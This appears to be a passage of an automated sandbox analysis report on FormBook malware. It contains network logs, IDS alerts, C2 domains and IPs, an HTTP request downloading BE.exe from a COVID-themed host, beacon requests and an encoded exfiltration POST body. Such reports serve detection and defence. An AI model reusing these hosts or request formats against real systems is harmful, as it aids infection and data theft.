Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49164 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49167 -> 47.238.226.135:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49169 -> 47.238.226.135:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49171 -> 162.255.119.150:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49173 -> 162.255.119.150:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49175 -> 66.96.162.142:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49177 -> 66.96.162.142:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49179 -> 192.185.225.30:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49181 -> 192.185.225.30:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49182 -> 203.161.62.199:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49183 -> 203.161.62.199:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49185 -> 203.161.62.199:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49187 -> 217.26.48.101:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49189 -> 217.26.48.101:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49191 -> 46.28.105.2:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49193 -> 46.28.105.2:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49195 -> 162.240.81.18:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49197 -> 162.240.81.18:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49199 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49201 -> 91.195.240.94:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49203 -> 46.242.239.47:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49205 -> 46.242.239.47:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49209 -> 208.91.197.27:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.22:49211 -> 172.67.145.66:80

Source: Joe Sandbox View	IP Address: 192.185.225.30 192.185.225.30
Source: Joe Sandbox View	IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View	IP Address: 45.33.6.223 45.33.6.223

Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View	ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View	ASN Name: HOMEPL-ASPL HOMEPL-ASPL

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Users\user\AppData\Roaming\fredchungel99962.exe

Code function: 5_2_0132CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,

5_2_0132CF1A

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7968B847-E29D-41C0-ACB8-AE84D1770DC9}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /BE.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: covid19help.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=a+HLDFsiIkHuV4rg9hSpoeAycD7cgouMO9xbFOtVeNEzn7JMPDdWHI+uhZWQfHs/Ujvr+dR2RkWjKutxCrTuIvieTAa4VE7MqIx0HySFP6zbT2TnTvQ9seTn5ysI&tv=6TdD8B HTTP/1.1Host: www.thechurchinkaty.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /2018/sqlite-dll-win32-x86-3240000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=cxIeN1iVhQqOwsowpzRnZtCznzKsqLvfdqpS9UswCbkbA/58Vi1sucBg6AEQyfE3zCqKK/TeeNcUyXGKguuzOA8pGaYO9UjuKGEJ7C/XCVyDdYvyJ7HtIExhgCVf&tv=6TdD8B HTTP/1.1Host: www.hggg2qyws.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=aN7x9cBVxwix9wZx7W63qGecWvzsMiI/orbHVM7uweNeZbe3aghpRaSsJCdVU54yexiCzw7M43tjxUe+olQadlEjapDpq3RKvSvMx1ELA/lUdJRJgrfKn72amtTp&tv=6TdD8B HTTP/1.1Host: www.297tamatest1kb.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=rSdoiViGYDYLrRKaPz3Wl2E0H4idUSMrBzK7mFXa25NHqewciJOPoSpxRDHHO+kRgCzM5kcGIwbMEKXffgYhKvnBPUmrqnWMxjfJBNBOhOMg9F9SVSa9oh3nojFO&tv=6TdD8B HTTP/1.1Host: www.quirkyquotients.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=i3HAzC/U9OJxIpd/aE0q2q4opSPsJIGS67PrGCHTQB0skmoYQlANVfiIbPI4IH/9kWpHr7erIPqYDzNgqjstw7965i84C6yRej7jTb0tuQprc2OKqp4FpQOaHFX3&tv=6TdD8B HTTP/1.1Host: www.zopter.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=SizHnN/9xgcqSIkR3Mp/mJItKwrd9Ch/0t0LsappuxDuweYFtCvxWsRrJ8CRzXcbZvFBcd4a+abpRcpo9JYs/p363666BVY+tJEOkjWCxOG41ow7FQErnKiMZNMn&tv=6TdD8B HTTP/1.1Host: www.gudvain.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=QRCJemSun6KfUPjb2qqlqGicxCzmZViyr2LzNdaeeYxuOQk1p7mHourK8lVarsbBIBvr9aHYFlgCj6kd/MlaSQeL42icjeH9s29nuCeOpLeM+yzNa72Kcg7xsQaX&tv=6TdD8B HTTP/1.1Host: www.nimaster.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=3O5z/vVa1aiBIg/2yUkhN/MO21wODAA4MhhTC4igeHW13Qm1DZfDyX2p9mwAZMK6YdFTnsLdJzS54ToP+ZiK/fxP+mbVzf034bYs7rsq3IWOdGvb01xGoV1iE4GP&tv=6TdD8B HTTP/1.1Host: www.deniztemiz.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=dWrD1PFadq7V5KkT4K5o1ooaeKyTUtdu4bG3e9Abb7XIEj/TR5WiVjbbrLaqi43PNcTkySoUuB0roTUDMpHLiI93yD7r6mO3qGIKC7GmJs3jJHvYZTDYbK7MHXTd&tv=6TdD8B HTTP/1.1Host: www.agoraeubebo.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=2at1c1MHk4LdsVUDX6VNCfiZAhfBXFznTyG93G2uP4ilKgyCyFz2SOnlOoLDNVe+GAWkq5GLoOyug5V+2NERvjVgTNNC5euwUf40sv0MPI9wPMaUWVPIc3sG3prc&tv=6TdD8B HTTP/1.1Host: www.5597043.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=cS0qtSAcX+pXbswFa2DQEUpgU+gsiJIsBUXhui9hTGS1u1fOXkoxFo6mlimfKNBB7XQLeoIRuez0ccXxIjo/0bdL2EvMrJzvcKQzHXpuK09s74lteTxOQbEHYjk7&tv=6TdD8B HTTP/1.1Host: www.domprojekt.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /nrup/?pX6dR=ggwUi3NE8XPYfrEyDYWF/0eo79hxseCGpDeyMd0GysDSfOPZ1SBHs6KFoNxq8E9UHwMkzvMMxi5vPk9k+MyKZrZ7RBl0G7n/meRcsnFLUeNExlbUnvd6pIbo3rGy&tv=6TdD8B HTTP/1.1Host: www.northeastcol0r.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: EQNEDT32.EXE, 00000002.00000002.345073188.0000000000667000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: covid19help.top
Source: global traffic	DNS traffic detected: DNS query: www.thechurchinkaty.com
Source: global traffic	DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic	DNS traffic detected: DNS query: www.hggg2qyws.sbs
Source: global traffic	DNS traffic detected: DNS query: www.297tamatest1kb.com
Source: global traffic	DNS traffic detected: DNS query: www.quirkyquotients.online
Source: global traffic	DNS traffic detected: DNS query: www.zopter.dev
Source: global traffic	DNS traffic detected: DNS query: www.gudvain.top
Source: global traffic	DNS traffic detected: DNS query: www.nimaster.com
Source: global traffic	DNS traffic detected: DNS query: www.deniztemiz.fun
Source: global traffic	DNS traffic detected: DNS query: www.agoraeubebo.com
Source: global traffic	DNS traffic detected: DNS query: www.5597043.com
Source: global traffic	DNS traffic detected: DNS query: www.domprojekt.pro
Source: global traffic	DNS traffic detected: DNS query: www.northeastcol0r.com
Source: global traffic	DNS traffic detected: DNS query: www.rtp7winbet.one

Source: unknown

HTTP traffic detected: POST /nrup/ HTTP/1.1Host: www.hggg2qyws.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.hggg2qyws.sbsConnection: closeContent-Length: 2162Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedReferer: http://www.hggg2qyws.sbs/nrup/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 70 58 36 64 52 3d 52 7a 67 2b 4f 43 36 4d 75 47 43 44 31 71 4d 55 70 79 35 55 50 38 75 48 6a 79 53 75 2f 65 47 45 59 49 35 4b 31 6b 78 79 52 5a 59 53 42 39 4d 6e 4e 55 41 66 71 74 64 55 78 67 64 67 39 72 41 4d 38 48 75 4f 47 36 50 55 46 4e 6b 2f 2f 33 75 39 32 2b 72 53 41 68 77 49 42 61 5a 38 37 6a 4f 48 4b 33 73 72 76 77 50 39 4b 30 4c 59 58 4c 2f 2b 59 66 54 4f 4a 48 64 7a 36 43 30 77 71 45 45 39 38 67 32 43 2b 57 6d 72 33 2f 4c 75 4b 51 4c 30 4d 36 65 78 50 32 72 72 4b 50 35 6d 57 43 32 65 64 58 6f 6f 58 53 41 70 51 67 46 4a 6f 78 41 37 4e 32 43 32 62 4c 46 37 55 54 30 66 59 59 42 58 2f 77 34 31 6a 71 6f 65 57 51 6b 30 7a 4a 39 4d 68 4b 42 6e 71 71 53 39 37 59 67 66 69 79 37 34 44 50 72 7a 46 44 71 37 39 6a 5a 4c 47 4c 64 38 57 74 70 44 6a 5a 71 4d 51 30 74 4f 58 76 4a 48 4e 66 55 52 31 68 45 65 47 38 36 44 65 36 51 61 64 65 79 38 43 4d 55 57 34 51 71 51 44 64 68 32 75 66 48 5a 53 73 6d 53 6a 51 55 55 6c 53 62 2f 37 62 49 4a 41 6f 4d 37 67 64 39 6a 6e 50 49 38 56 45 59 36 50 76 6f 67 73 4a 50 51 62 5a 32 4f 46 4b 2f 55 35 39 6a 4a 41 4d 6f 56 55 63 42 64 44 57 45 50 49 6d 35 78 4f 58 71 57 46 67 51 59 76 33 76 51 6a 5a 62 4f 31 41 7a 32 4d 42 76 45 61 31 58 36 47 46 43 69 63 69 66 76 6d 4a 4e 63 52 44 74 55 49 47 78 4f 67 59 73 4a 62 44 63 6f 78 69 45 49 72 4e 47 73 39 67 32 47 37 74 51 62 2b 6a 59 67 6d 65 76 52 72 72 79 4e 46 31 43 44 43 53 47 33 65 4c 6e 58 51 78 75 39 79 35 53 32 76 67 6a 2b 50 4c 4d 69 4e 4a 6d 69 65 65 55 59 6a 35 6c 45 4d 55 42 76 64 30 36 6f 39 4c 6b 59 78 30 77 71 78 63 69 72 33 6d 53 7a 5a 7a 6c 34 52 68 79 46 30 6d 36 76 38 75 32 43 46 42 65 76 62 77 66 4d 39 33 5a 4c 4a 76 73 6e 77 43 35 4a 36 5a 62 6a 34 33 52 70 66 64 32 51 65 59 6b 6e 74 67 73 62 2f 73 71 70 38 51 4e 7a 4a 55 44 6c 64 75 6c 31 4c 51 6f 42 59 54 79 75 39 56 75 71 72 47 57 32 31 6a 41 47 4f 30 62 42 54 63 38 67 33 2b 6c 31 6b 4a 6f 76 4f 64 50 75 48 49 61 31 4c 64 6b 41 35 53 4c 58 52 4f 57 47 49 41 4c 7a 68 52 71 6f 4e 67 6e 77 77 55 37 46 63 6a 37 6d 73 41 6d 37 6f 31 69 36 65 48 70 47 73 63 69 32 7a 39 69 48 74 33 4b 66 57 79 53 41 42 71 55 6f 43 4e 34 45 6e 33 46 52 7a 55 6c 35 37 57 64 2b 59 53 56 62 41 62 62 2f 30 4f 52 75 4f 34 45 49 54 74 4d 73 55 73 6b 65 4c 6d 37 52 69 58 54 35 34 51 6e 74 4c 57 42 74 79 41 74 77 4b 49 2b 45 6d 64 57 55 35 35 33 4e 45 2f 36 4a 2b 49 4d 52 63 68 31 33 6f 4a 4e 55 53 53 72 45 62 67 31 69 48 69 6f 58 41 63 6d 34 36 2b 6a 71 75 2b 33 76 5a 41 53 31 39 50 37 71 48 65 54 6a 56

